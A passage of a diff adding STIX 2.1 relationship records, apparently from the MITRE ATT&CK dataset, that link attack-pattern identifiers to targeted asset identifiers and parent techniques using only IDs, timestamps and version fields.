"x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--deb69e26-c432-4e50-af92-cd518df0ab08", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--deb83319-bc5a-4b9b-a44a-bd369b899601", + "created": "2024-03-25T20:18:12.056Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-25T20:18:12.056Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c5cf58c-a34a-40d7-82f4-f987cdfc2b91", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dec4112c-4f83-4e1d-aecb-1d6e91379bb9", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--def57041-6bb4-453a-bf04-188b9e97a35d", + "created": "2023-09-28T21:26:34.603Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:26:34.603Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--def791d9-d281-4d9e-873a-731883acb90e", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--def869f4-7564-4a09-8f49-59cb696b660d", + "created": "2020-03-13T11:42:14.588Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--17cc750b-e95b-4d7d-9dde-49e0de24148c", + "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--df210355-6610-4bf8-885b-25d931863c32", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--df2e9b95-a3f8-41e3-aaf2-ad006e4f71d4", + "created": "2024-06-26T13:42:24.754Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:42:24.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--df321d74-25d6-42da-80e8-3c9a291cb471", + "created": "2023-09-28T19:57:41.602Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:57:41.602Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--df434689-1c03-4f45-96e0-678456e1d509", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--df4c3463-efda-4100-a206-eb558d918e1e", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--df528a39-20f8-42b9-a46e-7f96bc6051fd", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--df546b9d-1065-4faa-aa0b-e54051e22c24", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--df630c04-cf13-4fce-a36e-d814dbef6317", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--df7b521e-4496-432f-a61d-3094d0c7bc23", + "created": "2023-09-29T17:58:26.994Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:58:26.994Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--df80e2b6-5672-4f26-a19c-a394f3731f24", + "created": "2023-09-28T19:48:48.649Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:48:48.649Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--df999c11-6e47-415a-9262-4c0eac0603e2", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--df99f8eb-385c-4f69-837f-f974fd98c452", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--df9f5a5b-0662-4904-8e57-bc25c244a6da", + "created": "2023-09-28T20:11:11.658Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:11:11.658Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dfb20521-91c2-4f55-b92a-dab959759b78", + "created": "2023-09-29T18:03:38.874Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:03:38.874Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dfb2f7f0-aacf-4bf3-9548-d3c1204c5d71", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dfc19325-9b8a-4cb7-80fc-dedc2cf8742a", + "created": "2020-06-24T16:55:46.408Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--77532a55-c283-4cd2-bc5d-2d0b65e9d88c", + "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dfc70b22-14d8-4e23-a78f-4abe9c10aaca", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0af0ca99-357d-4ba1-805f-674fdfb7bef9", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dfeb0053-3513-4622-a5c0-a3554c8970a7", + "created": "2021-03-29T17:06:22.388Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--1126cab1-c700-412f-a510-61f4937bb096", + "target_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dff78788-4209-4b0e-bfd3-3dc9e2f3836f", + "created": "2024-06-21T14:12:20.276Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.276Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e51137a5-1cdc-499e-911a-abaedaa5ac86", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e00b44e3-77b2-46a1-9897-5f6955eb4f07", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e02413d2-cce4-4bc4-a448-62321ce55b86", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e026a9f2-a62f-4693-9a9f-c68daaee80aa", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e03eb9ad-a90c-422b-8337-3f7b2671a284", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e049b50d-197f-468d-adc2-ecef9834600f", + "created": "2024-06-26T19:23:20.203Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:23:20.203Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e05e47c7-3639-4c06-b7bd-f2764e28916a", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e066c0e7-aa18-4b8e-ad0b-e57afc19a0ce", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a01bf75f-00b2-4568-a58f-565ff9bf202b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e07acc2b-6a92-423e-85be-a9caed4a8ee6", + "created": "2020-10-20T00:05:48.864Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc", + "target_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e08bdbd5-f0d8-4542-bbb1-e27835b12f0d", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d336b553-5da9-46ca-98a8-0b23f49fb447", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e08d5868-ffb8-447d-a70f-dda02d745651", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e0b00609-6938-42a6-9a47-903708c9455b", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e0ba2225-a137-4179-acdb-3822362e5234", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--e100d998-8bbc-4571-8189-1f652588e19d", + "created": "2024-06-27T09:05:13.340Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:05:13.340Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": 